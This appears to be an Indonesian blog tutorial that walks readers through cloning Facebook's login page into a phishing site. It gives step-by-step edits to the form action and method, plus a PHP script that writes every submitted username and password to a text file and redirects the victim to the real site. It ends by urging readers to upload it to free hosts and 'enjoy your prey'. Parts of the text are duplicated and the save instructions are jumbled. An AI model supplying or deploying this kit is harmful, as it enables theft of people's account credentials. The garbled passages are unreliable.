Assalamualaikum Wr.Wb
Kalian pasti pernah bertanya sebenarnya apa sih itu phishing? Gimana sih cara kerja phishing? Nah disini saya akan menjelaskan sedikit tentangnya dan mempraktikkan bagaimana cara membuat phishing link yang baik dan benar langsung saja check it out :p
Phishing adalah suatu bentuk spesifik dari kejahatan cyber. Kriminal menciptakan replika hampir 100 persen sempurna dari sebuah situs web lembaga keuangan yang dipilih, kemudian mencoba untuk mengelabui pengguna dalam untuk mengungkapkan informasi pribadi mereka - username, password, PIN dll - melalui formulir di website palsu.
Phisher menggunakan berbagai teknik untuk mengelabui pengguna dalam mengakses situs web palsu, seperti mengirim email yang berpura-pura menjadi dari bank. Email ini sering menggunakan logo yang sah, gaya bisnis yang baik dan sering spoof header email agar terlihat seperti itu datang dari bank yang sah. Secara umum, surat-surat ini menginformasikan penerima bahwa bank telah berubah infrastruktur IT-nya dan meminta semua pelanggan untuk mengkonfirmasi ulang informasi pengguna mereka. Ketika penerima mengklik link dalam email, mereka diarahkan ke website palsu, dimana mereka akan diminta untuk membocorkan informasi pribadi mereka.
Contoh kita ingin membuat phising situs facebook.
Buka http://www.facebook.com/login.php,
lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote/petik) dan kita akan mengeditnya.
pada action="https://login.facebook.com/login.php" ubahlah menjadi action="data.php"
kemudian ubah juga methode dari "POST" menjadi "get"
Kalian pasti pernah bertanya sebenarnya apa sih itu phishing? Gimana sih cara kerja phishing? Nah disini saya akan menjelaskan sedikit tentangnya dan mempraktikkan bagaimana cara membuat phishing link yang baik dan benar langsung saja check it out :p
Phishing adalah suatu bentuk spesifik dari kejahatan cyber. Kriminal menciptakan replika hampir 100 persen sempurna dari sebuah situs web lembaga keuangan yang dipilih, kemudian mencoba untuk mengelabui pengguna dalam untuk mengungkapkan informasi pribadi mereka - username, password, PIN dll - melalui formulir di website palsu.
Phisher menggunakan berbagai teknik untuk mengelabui pengguna dalam mengakses situs web palsu, seperti mengirim email yang berpura-pura menjadi dari bank. Email ini sering menggunakan logo yang sah, gaya bisnis yang baik dan sering spoof header email agar terlihat seperti itu datang dari bank yang sah. Secara umum, surat-surat ini menginformasikan penerima bahwa bank telah berubah infrastruktur IT-nya dan meminta semua pelanggan untuk mengkonfirmasi ulang informasi pengguna mereka. Ketika penerima mengklik link dalam email, mereka diarahkan ke website palsu, dimana mereka akan diminta untuk membocorkan informasi pribadi mereka.
Contoh kita ingin membuat phising situs facebook.
Buka http://www.facebook.com/login.php,
lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote/petik) dan kita akan mengeditnya.
pada action="https://login.facebook.com/login.php" ubahlah menjadi action="data.php"
kemudian ubah juga methode dari "POST" menjadi "get"
simpan notepad ini menjadi index.php (jangan html)
Buka notepad baru isikan kode berikut :
--> Simpan sebagai data.php
Buka notepad baru isikan kode berikut :
Code: Select all
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("keren.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
--> Simpan sebagai data.php
Nah sekarang kalian tinggal mengupload saja 2 file tersebut kedalam hosting misalnya idhostinger.com, 110mb.com, 000webhost.com atau 007sites.com.
Nikmatilah mangsa kalian :p dosa ditanggung pemakai ya :D
Wassalamualaikum Wr.Wb
ConversionConversion EmoticonEmoticon